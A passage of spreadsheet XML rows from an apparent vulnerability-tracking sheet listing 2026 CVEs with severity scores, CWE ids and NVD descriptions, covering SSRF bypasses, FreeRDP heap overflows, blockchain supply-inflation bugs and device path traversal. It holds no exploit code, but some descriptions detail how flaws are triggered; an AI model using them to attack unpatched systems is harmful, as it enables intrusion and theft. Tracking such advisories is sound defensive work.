      <c r="I1147" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr">
        <is>
          <t>CWE-76</t>
        </is>
      </c>
      <c r="L1147" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.4, is_url_safe in src/helpers.ts strips the @ userinfo delimiter with remove_at_symbol_in_string before new URL parses the URL, allowing an attacker-controlled URL to bypass internal-IP validation and cause a client using the original URL to reach an internal service. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="M1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54722</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54729</t>
        </is>
      </c>
      <c r="C1148" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1148" s="5" t="inlineStr"/>
      <c r="F1148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1148" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1148" s="5" t="inlineStr"/>
      <c r="I1148" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1148" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.5, is_url_safe can treat localhost as safe when DNS resolver 1.1.1.1 returns NXDOMAIN because dns.resolve4 yields no address and no dns.lookup fallback occurs, allowing server-side request forgery. This issue is fixed in version 1.0.5.</t>
        </is>
      </c>
      <c r="M1148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54729</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55100</t>
        </is>
      </c>
      <c r="C1149" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1149" s="5" t="inlineStr"/>
      <c r="F1149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1149" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1149" s="5" t="inlineStr"/>
      <c r="I1149" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-74</t>
        </is>
      </c>
      <c r="L1149" s="5" t="inlineStr">
        <is>
          <t>hashi-vault-js is a Node.js module for interacting with the HashiCorp Vault API. Prior to 0.5.2, src/Vault.js concatenates unencoded identifier values including name, username, group, role, and version into Vault request paths and query strings instead of using encodeURIComponent() and URLSearchParams, allowing path traversal and query parameter injection. This issue is fixed in version 0.5.2.</t>
        </is>
      </c>
      <c r="M1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55100</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55191</t>
        </is>
      </c>
      <c r="C1150" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1150" s="5" t="inlineStr"/>
      <c r="F1150" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1150" s="5" t="inlineStr"/>
      <c r="H1150" s="5" t="inlineStr"/>
      <c r="I1150" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L1150" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP clients that negotiate RDPGFX AVC444 with an H.264 decoder backend calculate the intermediate YUV444 allocation size in libfreerdp/codec/h264.c with 32-bit multiplication in avc444_ensure_buffer. A malicious RDP server can supply surface dimensions for which piDstStride multiplied by padDstHeight wraps to a small nonzero value, causing winpr_aligned_recalloc to allocate an undersized buffer before YUV420CombineToYUV444 writes using the actual stride and rectangle dimensions. This can cause a client crash and may permit code execution through attacker-influenced heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55191</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55193</t>
        </is>
      </c>
      <c r="C1151" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1151" s="5" t="inlineStr"/>
      <c r="F1151" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1151" s="5" t="inlineStr"/>
      <c r="H1151" s="5" t="inlineStr"/>
      <c r="I1151" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1151" s="5" t="inlineStr"/>
      <c r="K1151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1151" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP clients using TS Gateway accept a server-controlled max_xmit_frag value in libfreerdp/core/gateway/rpc_bind.c without bounding it to the 4088-byte ReceiveFragment allocation. A malicious gateway can advertise 65535 and then send a response fragment of the same length, causing rpc_channel_read in libfreerdp/core/gateway/rpc.c to write up to 65535 bytes into the smaller ReceiveFragment buffer. This can crash the client and may permit code execution through attacker-controlled heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55193</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55194</t>
        </is>
      </c>
      <c r="C1152" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1152" s="5" t="inlineStr"/>
      <c r="F1152" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1152" s="5" t="inlineStr"/>
      <c r="H1152" s="5" t="inlineStr"/>
      <c r="I1152" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1152" s="5" t="inlineStr"/>
      <c r="K1152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1152" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, rpc_client_recv_fragment in libfreerdp/core/gateway/rpc_client.c ensures the response reassembly stream capacity using only the server-declared alloc_hint rather than the actual StubLength about to be written. A malicious TS Gateway can send a PTYPE_RESPONSE with a small alloc_hint and a much larger frag_length, causing Stream_Write to copy attacker-controlled stub data beyond the 4096-byte pdu-&gt;s buffer. This can crash the client and may permit code execution through heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55194</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55245</t>
        </is>
      </c>
      <c r="C1153" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1153" s="5" t="inlineStr"/>
      <c r="F1153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1153" s="5" t="inlineStr"/>
      <c r="H1153" s="5" t="inlineStr"/>
      <c r="I1153" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1153" s="5" t="inlineStr"/>
      <c r="K1153" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1153" s="5" t="inlineStr">
        <is>
          <t>Bifrost is an enterprise AI gateway for routing requests to model providers. Prior to 1.5.17, the isPublicIP function in core/providers/utils/fetch.go, reached through FetchAndEncodeURL for Bedrock and Vertex image or document URLs, classifies Carrier-Grade NAT 100.64.0.0/10, IPv6 6to4 2002::/16, NAT64 64:ff9b::/96 and 64:ff9b:1::/48, and deprecated IPv6 site-local fec0::/10 addresses as public. A remote attacker who controls a multimodal request URL can make the gateway fetch internal services, including a cloud instance metadata endpoint encoded through 6to4 or NAT64. This issue is fixed in version 1.5.17.</t>
        </is>
      </c>
      <c r="M1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55245</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="C1154" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1154" s="5" t="inlineStr"/>
      <c r="F1154" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1154" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1154" s="5" t="inlineStr"/>
      <c r="I1154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1154" s="5" t="inlineStr"/>
      <c r="K1154" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="L1154" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55763</t>
        </is>
      </c>
      <c r="C1155" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1155" s="5" t="inlineStr"/>
      <c r="F1155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1155" s="5" t="inlineStr"/>
      <c r="H1155" s="5" t="inlineStr"/>
      <c r="I1155" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1155" s="5" t="inlineStr"/>
      <c r="K1155" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="L1155" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, processPercentageRoyaltiesTransfer in core/kapp/accounts/accounts.go calls SubFromBalance after the split loop and after the royaltiesToPay &lt;= 0 early return. computeSplitRoyalties rejects only when splitToPay &gt; royaltiesToPay, so a valid PercentTransferPercentage = 10000 split consumes exactly 100 percent of the royalty pool, sets royaltiesToPay to zero, and returns before the source account is debited. The split recipient receives the full royaltyAmount while the sender pays nothing and the supply counter is not updated, allowing unbounded off-the-books inflation of the transferred KDA. A KDA owner must configure a TransferPercentage royalty with a 100 percent split, after which any holder's transfer of the asset triggers the mint; the sibling processFixedRoyaltiesTransfer path is not affected because it debits the source before distribution. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55763</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55764</t>
        </is>
      </c>
      <c r="C1156" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1156" s="5" t="inlineStr"/>
      <c r="F1156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1156" s="5" t="inlineStr"/>
      <c r="H1156" s="5" t="inlineStr"/>
      <c r="I1156" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1156" s="5" t="inlineStr"/>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, Klever-Go allows a mint-role holder to bypass a finite per-nonce MaxSupply on the semi-fungible token add-quantity path. In core/kapp/systemAccount/systemAcount.go, SFTAddCirculation performed meta.Circulation += amount before evaluating whether Circulation exceeded MaxSupply, without checking for signed int64 overflow. A large positive raw Amount supplied through processSemiFungibleAddQuantity in core/kapp/kda/mint.go can wrap Circulation negative, causing the signed maximum-supply comparison to pass and crediting approximately MaxInt64 units while corrupting the on-chain counter. The fungible path is not affected because its MintedValue &lt;= 0 guard detects the overflow. The correction uses the consensus activation flag FixMarketBuyOverflow. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55764</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55768</t>
        </is>
      </c>
      <c r="C1157" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1157" s="5" t="inlineStr"/>
      <c r="F1157" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1157" s="5" t="inlineStr"/>
      <c r="H1157" s="5" t="inlineStr"/>
      <c r="I1157" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1157" s="5" t="inlineStr"/>
      <c r="K1157" s="5" t="inlineStr">
        <is>
          <t>CWE-681, CWE-789</t>
        </is>
      </c>
      <c r="L1157" s="5" t="inlineStr">
        <is>
          <t>GoAccess is a real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through the browser. Prior to version 1.11, the built-in WebSocket server narrows a 64-bit extended frame length into the signed 32-bit WSFrame.payloadlen field before enforcing the maximum frame size, allowing an unauthenticated remote client to bypass the guard and force an approximately 18-exabyte allocation request that terminates the process. This issue is fixed in version 1.11.</t>
        </is>
      </c>
      <c r="M1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55768</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56718</t>
        </is>
      </c>
      <c r="C1158" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1158" s="5" t="inlineStr"/>
      <c r="F1158" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1158" s="5" t="inlineStr"/>
      <c r="H1158" s="5" t="inlineStr"/>
      <c r="I1158" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1158" s="5" t="inlineStr"/>
      <c r="K1158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1158" s="5" t="inlineStr">
        <is>
          <t>AJCloud AJY IPC firmware prior to version 01.10715.11.37 contains a path traversal vulnerability in the jdbhttpd web service that allows unauthenticated remote attackers to read arbitrary files with root privileges by supplying path traversal sequences in the HTTP request URI. Attackers can send crafted HTTP requests to port 80 without authentication to access sensitive files including cleartext RTSP credentials, Wi-Fi SSID and pre-shared key, device serial number, and cloud binding parameters.</t>
        </is>
      </c>
      <c r="M1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56718</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57445</t>
        </is>
      </c>
      <c r="C1159" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1159" s="5" t="inlineStr"/>
      <c r="F1159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1159" s="5" t="inlineStr"/>
      <c r="H1159" s="5" t="inlineStr"/>
      <c r="I1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1159" s="5" t="inlineStr"/>
      <c r="K1159" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="L1159" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In dfba919e218e20d52db9f7b2e8d292d45a46c91b and prior, normal beneficiary payout paths in StreamingEscrow preserve depositAmount() while an active stream needs an escrow reserve. However, the approve-side dispute resolution path drains the whole available escrow balance to the proposal beneficiary. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57445</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59643</t>
        </is>
      </c>
      <c r="C1160" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1160" s="5" t="inlineStr"/>
      <c r="F1160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1160" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1160" s="5" t="inlineStr">
        <is>
          <t>bouncycastle:bc-java, bouncycastle:bcpg-fips</t>
        </is>
      </c>
      <c r="I1160" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1160" s="5" t="inlineStr"/>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr">
        <is>
          <t>In Bouncy Castle for Java before 1.85, OpenPGP inline-signature policy failures silently ignored. This issue also affects Bouncy Castle for Java FIPS (BC-FJA) before bcpg-fips 2.0.13.</t>
        </is>
      </c>
      <c r="M1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59643</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61556</t>
        </is>
      </c>
      <c r="C1161" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1161" s="5" t="inlineStr"/>
      <c r="F1161" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1161" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1161" s="5" t="inlineStr"/>
      <c r="I1161" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1161" s="5" t="inlineStr"/>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. From 10.26.0 until 10.27.1, the strip_html filter in src/filters/html.ts can enter an infinite loop when an input string contains &lt;, includes at least one preceding character, and has no later &gt;. In strip_html, the search for the next opener advances lt while the loop index remains unchanged when the closer search returns -1, and the equality-only stall guard does not exit because the loop index is less than lt. Reprocessing the same state indefinitely blocks template rendering and can cause denial of service with an input as short as a&lt;. This issue is fixed in version 10.27.1.</t>
        </is>
      </c>
      <c r="M1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61556</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62243</t>
        </is>
      </c>
      <c r="C1162" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1162" s="5" t="inlineStr"/>
      <c r="F1162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1162" s="5" t="inlineStr">
        <is>
          <t>java, openssl, .net</t>
        </is>
      </c>
      <c r="H1162" s="5" t="inlineStr"/>
      <c r="I1162" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr">
        <is>
          <t>Netty (io.netty:netty-handler) versions from 4.2.0.Final through 4.2.16.Final and versions through 4.1.136.Final disable TLS hostname verification on the SslProvider.OPENSSL client path when a plain (non-extended) X509TrustManager is used and Unsafe-based trust-manager wrapping is unavailable (Java 25+). In this configuration the OpenSSL client does not perform hostname verification, allowing a man-in-the-middle attacker to present a certificate issued for a different hostname that is accepted without validation. Fixed in 4.2.17.Final and 4.1.137.Final.</t>
        </is>
      </c>
      <c r="M1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62243</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62292</t>
        </is>
      </c>
      <c r="C1163" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1163" s="5" t="inlineStr"/>
      <c r="F1163" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1163" s="5" t="inlineStr"/>
      <c r="H1163" s="5" t="inlineStr"/>
      <c r="I1163" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1163" s="5" t="inlineStr"/>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. From 1.19.0 until 1.23.1, a crafted uncompressed HEIF image using generic zlib unci full-item compression can crash an application that decodes an advertised tile with heif_image_handle_decode_image_tile(). In libheif/codecs/uncompressed/unc_decoder.cc, unc_decoder::fetch_tile_data() computes a large tile offset and unc_decoder::get_compressed_image_data_uncompressed() validates it with range_start_offset plus range_size. For the last advertised tile (4095, 4095), the addition can wrap to zero, bypass the bounds check, and pass an invalid source pointer and a one-terabyte length to memcpy. The observed result is an out-of-bounds read and process crash; opening the file alone does not trigger the issue because tile decoding is required. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62292</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62648</t>
        </is>
      </c>
      <c r="C1164" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1164" s="5" t="inlineStr"/>
      <c r="F1164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1164" s="5" t="inlineStr"/>
      <c r="H1164" s="5" t="inlineStr"/>
      <c r="I1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1164" s="5" t="inlineStr"/>
      <c r="K1164" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1164" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62649</t>
        </is>
      </c>
      <c r="C1165" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1165" s="5" t="inlineStr"/>
      <c r="F1165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1165" s="5" t="inlineStr"/>
      <c r="H1165" s="5" t="inlineStr"/>
      <c r="I1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1165" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62650</t>
        </is>
      </c>
      <c r="C1166" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1166" s="5" t="inlineStr"/>
      <c r="F1166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1166" s="5" t="inlineStr"/>
      <c r="H1166" s="5" t="inlineStr"/>
      <c r="I1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1166" s="5" t="inlineStr"/>
      <c r="K1166" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1166" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t>
        </is>
      </c>
      <c r="M1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
